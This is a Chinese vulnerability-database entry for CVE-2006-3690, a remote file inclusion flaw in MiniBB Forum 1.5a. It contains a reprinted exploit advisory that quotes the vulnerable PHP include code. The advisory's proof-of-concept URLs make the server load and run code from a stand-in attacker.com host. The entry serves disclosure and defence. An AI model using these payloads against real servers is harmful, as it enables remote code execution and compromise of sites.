CVE-2006-3690
CVSS7.5
发布时间 :2006-07-21 10:03:00
修订时间 :2008-09-05 17:07:48
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) components/com_minibb.php or (2) components/minibb/index.php.


[CNNVD]MiniBB多个远程文件包含漏洞(CNNVD-200607-359)

         MiniBB(Minimalistic Bulletin Board)是一个线性的可定制电子布告栏程序。
         MiniBB处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
         MiniBB的com_minibb.php和index.php脚本没能对absolute_path变量做充分的检查过滤,攻击者可以使脚本包含远程服务器上的PHP代码执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3690
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3690
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-359
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27749
(UNKNOWN)  XF  minibb-multiple-scripts-file-include(27749)
http://www.securityfocus.com/bid/18998
(UNKNOWN)  BID  18998
http://www.securityfocus.com/archive/1/archive/1/440132/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060715 MiniBB Forum <= 1.5a Remote File Include Vulnerabilities
http://securitytracker.com/id?1016507
(UNKNOWN)  SECTRACK  1016507
http://www.osvdb.org/28594
(UNKNOWN)  OSVDB  28594
http://www.milw0rm.com/exploits/2030
(UNKNOWN)  MILW0RM  2030
http://securityreason.com/securityalert/1245
(UNKNOWN)  SREASON  1245
http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt
(UNKNOWN)  MISC  http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt

- 漏洞信息

MiniBB多个远程文件包含漏洞
高危 输入验证
2006-07-21 00:00:00 2006-08-15 00:00:00
远程  
         MiniBB(Minimalistic Bulletin Board)是一个线性的可定制电子布告栏程序。
         MiniBB处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
         MiniBB的com_minibb.php和index.php脚本没能对absolute_path变量做充分的检查过滤,攻击者可以使脚本包含远程服务器上的PHP代码执行。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.minibb.net/authors.html

- 漏洞信息 (2030)

MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities (EDBID:2030)
php webapps
2006-07-17 Verified
0 Matdhule
N/A [点击下载]
---------------------------------------------------------------------------------------------

MiniBB Forum Mambo Component <= 1.5a Remote File Include Vulnerabilities
-----------------------------------------------------------------------------------------------

 
Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 14th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt
                  http://www.securityfocus.com/bid/18998
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------

 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# MiniBB Forum

Application     : MiniBB Forum (com_minibb.php & index.php)
version         : 1.5a

------------------------------------------------------------------------

 
Vulnerability:
~~~~~~~~~~~~~~~
 
# MiniBB Forum

In folder components we found vulnerability script com_minibb.php.

-----------------------com_minibb.php-----------------------------------
...................

If ($current=="bb_admin"){
  include("$absolute_path/components/minibb/bb_admin.php");
} else {
  include("$absolute_path/components/minibb/index.php");
...................

------------------------------------------------------------------------

In folder minibb we found vulnerability script index.php.

-----------------------index.php----------------------------------------
..............................

define ('INCLUDED776',1);

include ($absolute_path.'/components/minibb/setup_options.php');
if (isset($HTTP_COOKIE_VARS[$cookiename.'Language']) and $langCook=${$cookiename.'Language'}) { if
(file_exists("$absolute_path/components/minibb/lang/{$langCook}.php")) $lang=$langCook; }
include ($absolute_path.'/components/minibb/setup_'.$DB.'.php');
..............................

Variables $absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.
 
Proof Of Concept:
~~~~~~~~~~~~~~~~
 
http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php?absolute_path= http://attacker.com/evil.txt?

Solution:
~~~~~~~~
 
sanitize variabel $absolute_path.
 
 
------------------------------------------------------------------------
---
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @ irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]---------------------------------- 

# milw0rm.com [2006-07-17]
		

- 漏洞信息

28594
miniBB Forum com_minibb.php absolute_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

MiniBB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to com_minibb.php not properly sanitizing user input supplied to the 'absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-07-15 Unknow
2006-07-18 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站